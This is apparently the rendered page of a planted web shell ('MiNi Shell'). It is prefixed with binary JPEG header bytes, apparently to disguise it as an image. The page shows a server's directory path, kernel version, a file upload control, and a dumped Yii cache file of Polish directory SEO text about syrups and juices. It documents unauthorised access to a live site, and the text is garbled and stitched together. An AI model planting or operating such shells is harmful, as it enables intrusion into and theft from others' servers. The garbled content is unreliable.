JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/frontend/runtime/cache/e0/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/frontend/runtime/cache/e0/e06e2eead23e5e87d793e0d8f85a878a.bin

a:2:{i:0;a:1:{i:0;a:2:{i:0;a:10:{s:11:"id_category";i:1501;s:9:"id_portal";i:71;s:4:"name";s:6:"Syropy";s:11:"description";N;s:4:"left";i:89;s:5:"right";i:90;s:5:"depth";i:2;s:10:"created_at";s:19:"2019-10-24 16:50:13";s:10:"updated_at";s:19:"2025-10-24 02:51:09";s:12:"seo_metadata";s:7410:"{"p_71": {"faq": "<script type=\"application/ld+json\">\n{\n  \"@context\": \"https://schema.org\",\n  \"@type\": \"FAQPage\",\n  \"mainEntity\": [\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy syropy BIO są dostępne?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Tak, coraz więcej producentów wprowadza ekologiczne warianty syropów.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy syropy mogą być bezcukrowe?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Tak, dostępne są warianty ze słodzikami.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Jak przechowywać syropy i jaki mają termin przydatności?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Termin przydatności zależy od receptury i opakowania, zwykle wynosi od kilku miesięcy do kilku lat. Przechowuj syropy w chłodnym, suchym miejscu, po otwarciu niektóre produkty wymagają przechowywania w lodówce—sprawdź etykietę.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"W jakich proporcjach stosuje się syropy w napojach i deserach?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Proporcje zależą od intensywności syropu i preferencji smakowych; w napojach często stosuje się od kilku do kilkudziesięciu mililitrów na porcję. W gastronomii stosuje się miarki lub dozowniki, by zapewnić powtarzalność smaku.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy syropy nadają się do zastosowań profesjonalnych w HoReCa?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Tak, wielu producentów oferuje opakowania i koncentracje dostosowane do potrzeb HoReCa, w tym duże opakowania i systemy dozowania.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy możliwe jest zamówienie syropów pod markę (private label)?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Tak, wiele firm oferuje produkcję private label. Warunki zamówienia, minimalne ilości i terminy realizacji różnią się między producentami.\"\n      }\n    }\n  ]\n}\n</script>", "about": "Lista firm w kategorii Syropy: syropy owocowe, smakowe, funkcjonalne, produkty BIO i rozwiązania dla HoReCa.", "title": "Syropy – producenci, dostawcy i firmy | Jedzenie.info.pl", "keywords": "syropy, syropy owocowe, syropy smakowe, syropy bezcukrowe, syropy BIO, syropy do kawy, syropy HoReCa, syropy funkcjonalne, private label syropy", "description_html": "<h1>Syropy</h1>\n<p>To skoncentrowane płyny o intensywnym smaku, wykorzystywane do przygotowywania napojów, deserów i jako dodatek kulinarny. Stanowią popularny produkt zarówno w gospodarstwach domowych, jak i gastronomii.</p>\n\n<h2>Najważniejsze informacje:</h2>\n<ul>\n<li>Skoncentrowane płyny o intensywnym smaku stosowane do napojów, deserów i dań</li>\n<li>Dostępne warianty: owocowe, smakowe, funkcjonalne (np. witaminowe) oraz produkty dla HoReCa</li>\n<li>Opcje bezcukrowe oraz ekologiczne (BIO)</li>\n<li>Wybór syropu powinien uwzględniać zawartość owoców, dodatki, konserwanty i certyfikaty jakości</li>\n<li>Możliwość produkcji pod markę klienta (private label) oraz różne rozmiary i typy opakowań</li>\n<li>Syropy mają szerokie zastosowanie w gastronomii, barach kawowych i produkcji deserów</li>\n</ul>\n\n<p><!-- pagebreak --></p>\n<h2>Wprowadzenie / kontekst kategorii</h2>\n<p>Kategoria „Syropy” obejmuje producentów i dystrybutorów różnorodnych syropów owocowych, smakowych i funkcjonalnych.</p>\n<h2>Co oferują firmy z tej kategorii?</h2>\n<ul>\n  <li><a href=\"https://www.jedzenie.info.pl/firmy/lista/1501_syropy\" title=\"Syropy\" target=\"_blank\" rel=\"noopener\">Syropy</a> owocowe</li>\n  <li><a href=\"https://www.jedzenie.info.pl/firmy/lista/1501_syropy\" title=\"Syropy\" target=\"_blank\" rel=\"noopener\">Syropy</a> smakowe do <a href=\"https://www.jedzenie.info.pl/firmy/lista/1471_kawa\" title=\"Kawa\" target=\"_blank\" rel=\"noopener\">kaw</a> i deserów</li>\n  <li><a href=\"https://www.jedzenie.info.pl/firmy/lista/1501_syropy\" title=\"Syropy\" target=\"_blank\" rel=\"noopener\">Syropy</a> funkcjonalne (np. witaminowe)</li>\n  <li><a href=\"https://www.jedzenie.info.pl/firmy/lista/1534_produkty-ekologiczne\" title=\"Produkty BIO i ekologiczne\" target=\"_blank\" rel=\"noopener\">Produkty BIO i ekologiczne</a></li>\n  <li><a href=\"https://www.jedzenie.info.pl/firmy/lista/1501_syropy\" title=\"Syropy\" target=\"_blank\" rel=\"noopener\">Syropy</a> do gastronomii i HoReCa</li>\n  <li>Private label</li>\n</ul>\n<h2>Na co zwrócić uwagę przy wyborze / kryteria doboru</h2>\n<p>Warto sprawdzać zawartość owoców, obecność konserwantów i sztucznych dodatków, certyfikaty jakości oraz sposób pakowania.</p>\n<h2>Korzyści biznesowe i operacyjne</h2>\n<p>Syropy cieszą się stabilnym popytem, znajdują zastosowanie w gastronomii i handlu detalicznym, a także w produkcji napojów.</p>\n<h2>Zastosowania / przykładowe scenariusze</h2>\n<ul>\n  <li>Przygotowywanie napojów</li>\n  <li>Gastronomia i HoReCa</li>\n  <li>Produkcja deserów i wypieków</li>\n  <li>Eksport</li>\n</ul>\n<h2>Najczęściej zadawane pytania (FAQ)</h2>\n<h3>Czy syropy BIO są dostępne?</h3>\n<p>Tak, coraz więcej producentów wprowadza ekologiczne warianty syropów.</p>\n<h3>Czy syropy mogą być bezcukrowe?</h3>\n<p>Tak, dostępne są warianty ze słodzikami.</p>\n<h3>Jak przechowywać syropy i jaki mają termin przydatności?</h3>\n<p>Termin przydatności zależy od receptury i opakowania, zwykle wynosi od kilku miesięcy do kilku lat. Przechowuj syropy w chłodnym, suchym miejscu, po otwarciu niektóre produkty wymagają przechowywania w lodówce—sprawdź etykietę.</p>\n<h3>W jakich proporcjach stosuje się syropy w napojach i deserach?</h3>\n<p>Proporcje zależą od intensywności syropu i preferencji smakowych; w napojach często stosuje się od kilku do kilkudziesięciu mililitrów na porcję. W gastronomii stosuje się miarki lub dozowniki, by zapewnić powtarzalność smaku.</p>\n<h3>Czy syropy nadają się do zastosowań profesjonalnych w HoReCa?</h3>\n<p>Tak, wielu producentów oferuje opakowania i koncentracje dostosowane do potrzeb HoReCa, w tym duże opakowania i systemy dozowania.</p>\n<h3>Czy możliwe jest zamówienie syropów pod markę (private label)?</h3>\n<p>Tak, wiele firm oferuje produkcję private label. Warunki zamówienia, minimalne ilości i terminy realizacji różnią się między producentami.</p>\n<h2>Zobacz również</h2>\n<ul>\n  <li><a title=\"Soki i nektary\" href=\"https://www.jedzenie.info.pl/firmy/lista/1500_soki-nektary\" target=\"_blank\" rel=\"noopener\">Soki i nektary</a></li>\n  <li><a title=\"Napoje\" href=\"https://www.jedzenie.info.pl/firmy/lista/1495_napoje\" target=\"_blank\" rel=\"noopener\">Napoje</a></li>\n  <li><a title=\"Woda\" href=\"https://www.jedzenie.info.pl/firmy/lista/1502_woda\" target=\"_blank\" rel=\"noopener\">Woda</a></li>\n</ul>", "description_plaintext": "Znajdź producentów i dostawców syropów: owocowe, smakowe, funkcjonalne i ekologiczne. Dowiedz się o zastosowaniach w gastronomii, opcjach bezcukrowych i private label."}}";}i:1;a:10:{s:11:"id_category";i:1500;s:9:"id_portal";i:71;s:4:"name";s:13:"Soki, nektary";s:11:"description";N;s:4:"left";i:87;s:5:"right";i:88;s:5:"depth";i:2;s:10:"created_at";s:19:"2019-10-24 16:50:13";s:10:"updated_at";s:19:"2025-10-24 02:51:09";s:12:"seo_metadata";s:7214:"{"p_71": {"faq": "<script type=\"application/ld+json\">\n{\n  \"@context\": \"https://schema.org\",\n  \"@type\": \"FAQPage\",\n  \"mainEntity\": [\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czym różni się sok od nektaru?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Sok 100% zawiera wyłącznie naturalny sok owocowy, nektar natomiast jest rozcieńczony wodą i często dosładzany.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy dostępne są soki BIO?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Tak, wielu producentów oferuje soki ekologiczne z certyfikatami jakości.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Jak przechowywać soki po otwarciu?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Po otwarciu soki należy przechowywać w lodówce i spożyć w ciągu kilku dni zgodnie z zaleceniami producenta; wersje pasteryzowane zwykle mają dłuższą trwałość niż świeże soki tłoczone.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy pasteryzacja wpływa na wartość odżywczą soków?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Pasteryzacja wydłuża trwałość i eliminuje mikroorganizmy, jednak może nieznacznie obniżyć zawartość niektórych witamin w porównaniu do świeżych soków tłoczonych.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy soki bez cukru są całkowicie pozbawione dodatków?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Soki oznaczone jako 'bez cukru' nie zawierają dodanego cukru, ale warto sprawdzić etykietę w kwestii substancji słodzących, konserwantów lub soków zagęszczonych.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy soki są odpowiednie dla dzieci?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Wiele soków jest bezpiecznych dla dzieci, jednak dla niemowląt i małych dzieci zaleca się konsultację z pediatrą oraz wybór odpowiednich, rozcieńczonych i bez dodatku cukru produktów.\"\n      }\n    }\n  ]\n}\n</script>", "about": "Lista firm w kategorii soki i nektary: producenci i dystrybutorzy soków 100%, nektarów, mieszanek owocowo-warzywnych oraz produktów ekologicznych i bez cukru.", "title": "Soki i nektary – producenci, dostawcy i firmy | Jedzenie.info.pl", "keywords": "soki i nektary, soki 100%, nektary, soki owocowe, soki warzywne, soki BIO, soki bez cukru, producenci soków, dostawcy soków, private label soki", "description_html": "<h1>Soki i nektary</h1>\n<p>To popularne napoje owocowe i warzywne, które są cenione za naturalny smak i wartości odżywcze. Stanowią zdrową alternatywę dla napojów gazowanych i funkcjonalnych.</p>\n\n<h2>Najważniejsze informacje:</h2>\n<ul>\n<li>Naturalne soki i nektary — dostępne w wersjach 100% oraz rozcieńczonych</li>\n<li>Szeroki wybór: soki owocowe, nektary, mieszanki owocowo-warzywne i produkty bez dodatku cukru</li>\n<li>Oferta obejmuje produkty ekologiczne (BIO) oraz rozwiązania private label dla detalistów</li>\n<li>Istotne kryteria wyboru: zawartość owoców, brak sztucznych dodatków, certyfikaty jakości</li>\n<li>Główne zastosowania: handel detaliczny, gastronomia (HoReCa), automaty vendingowe i eksport</li>\n<li>Różne formy przetwarzania i pakowania — od pasteryzowanych po świeże soki tłoczone</li>\n</ul>\n\n<p><!-- pagebreak --></p>\n<h2>Wprowadzenie / kontekst kategorii</h2>\n<p>Kategoria „Soki, nektary” obejmuje producentów i dystrybutorów soków owocowych, warzywnych oraz ich mieszanek.</p>\n<h2>Co oferują firmy z tej kategorii?</h2>\n<ul>\n  <li><a title=\"Soki 100% owocowe\" href=\"https://www.jedzenie.info.pl/firmy/lista/1500_soki-nektary\" target=\"_blank\" rel=\"noopener\">Soki 100% owocowe</a></li>\n  <li><a title=\"Nektary owocowe\" href=\"https://www.jedzenie.info.pl/firmy/lista/1500_soki-nektary\" target=\"_blank\" rel=\"noopener\">Nektary owocowe</a></li>\n  <li><a title=\"Mieszanki owocowo-warzywne\" href=\"https://www.jedzenie.info.pl/firmy/lista/1500_soki-nektary\" target=\"_blank\" rel=\"noopener\">Mieszanki owocowo-warzywne</a></li>\n  <li><a title=\"Produkty BIO i ekologiczne\" href=\"https://www.jedzenie.info.pl/firmy/lista/1534_produkty-ekologiczne\" target=\"_blank\" rel=\"noopener\">Produkty BIO i ekologiczne</a></li>\n  <li>Wersje bez cukru</li>\n  <li>Private label</li>\n</ul>\n<h2>Na co zwrócić uwagę przy wyborze / kryteria doboru</h2>\n<p>Ważne są: zawartość owoców, brak sztucznych dodatków, certyfikaty jakości i świeżość produktu.</p>\n<h2>Korzyści biznesowe i operacyjne</h2>\n<p>Soki i nektary to produkty o wysokim popycie, popularne w handlu detalicznym i gastronomii, stanowiące istotny segment rynku napojów.</p>\n<h2>Zastosowania / przykładowe scenariusze</h2>\n<ul>\n  <li>Handel detaliczny i hurtowy</li>\n  <li>Gastronomia i HoReCa</li>\n  <li>Automaty vendingowe</li>\n  <li>Eksport</li>\n</ul>\n<h2>Najczęściej zadawane pytania (FAQ)</h2>\n<h3>Czym różni się sok od nektaru?</h3>\n<p>Sok 100% zawiera wyłącznie naturalny sok owocowy, nektar natomiast jest rozcieńczony wodą i często dosładzany.</p>\n<h3>Czy dostępne są soki BIO?</h3>\n<p>Tak, wielu producentów oferuje soki ekologiczne z certyfikatami jakości.</p>\n<h3>Jak przechowywać soki po otwarciu?</h3>\n<p>Po otwarciu soki należy przechowywać w lodówce i spożyć w ciągu kilku dni zgodnie z zaleceniami producenta; wersje pasteryzowane zwykle mają dłuższą trwałość niż świeże soki tłoczone.</p>\n<h3>Czy pasteryzacja wpływa na wartość odżywczą soków?</h3>\n<p>Pasteryzacja wydłuża trwałość i eliminuje mikroorganizmy, jednak może nieznacznie obniżyć zawartość niektórych witamin w porównaniu do świeżych soków tłoczonych.</p>\n<h3>Czy soki bez cukru są całkowicie pozbawione dodatków?</h3>\n<p>Soki oznaczone jako 'bez cukru' nie zawierają dodanego cukru, ale warto sprawdzić etykietę w kwestii substancji słodzących, konserwantów lub soków zagęszczonych.</p>\n<h3>Czy soki są odpowiednie dla dzieci?</h3>\n<p>Wiele soków jest bezpiecznych dla dzieci, jednak dla niemowląt i małych dzieci zaleca się konsultację z pediatrą oraz wybór odpowiednich, rozcieńczonych i bez dodatku cukru produktów.</p>\n<h2>Zobacz również</h2>\n<ul>\n  <li><a title=\"Napoje\" href=\"https://www.jedzenie.info.pl/firmy/lista/1495_napoje\" target=\"_blank\" rel=\"noopener\">Napoje</a></li>\n  <li><a title=\"Niegazowane\" href=\"https://www.jedzenie.info.pl/firmy/lista/1499_niegazowane\" target=\"_blank\" rel=\"noopener\">Niegazowane</a></li>\n  <li><a title=\"Syropy\" href=\"https://www.jedzenie.info.pl/firmy/lista/1501_syropy\" target=\"_blank\" rel=\"noopener\">Syropy</a></li>\n</ul>", "description_plaintext": "Znajdź producentów i dostawców soków i nektarów: soki 100%, nektary, mieszanki owocowo-warzywne, produkty BIO i wersje bez cukru. Sprawdź oferty i certyfikaty producentów."}}";}}}i:1;O:25:"yii\caching\TagDependency":3:{s:4:"tags";a:5:{i:0;s:13:"company_88073";i:1;s:19:"presentation_123731";i:2;s:32:"presentation_123731_contact_data";i:3;s:18:"company_88073_tabs";i:4;s:40:"presentation_123731_industries_and_range";}s:4:"data";a:5:{s:32:"d955d516e4ca4bf8805138ef5c6c7514";s:21:"0.08203100 1746577477";s:32:"093e75e78bd2c3f5892ad8f19bb024b0";s:21:"0.08203100 1746577477";s:32:"4752fc59fe180231302d1a40f5984015";s:21:"0.08203100 1746577477";s:32:"950cabe135f35d2596e8c30eff922544";s:21:"0.08203100 1746577477";s:32:"481dda9ea387c8945728e300fd7f95d8";s:21:"0.34655400 1754672387";}s:8:"reusable";b:0;}}

Creat By MiNi SheLL
Email: jattceo@gmail.com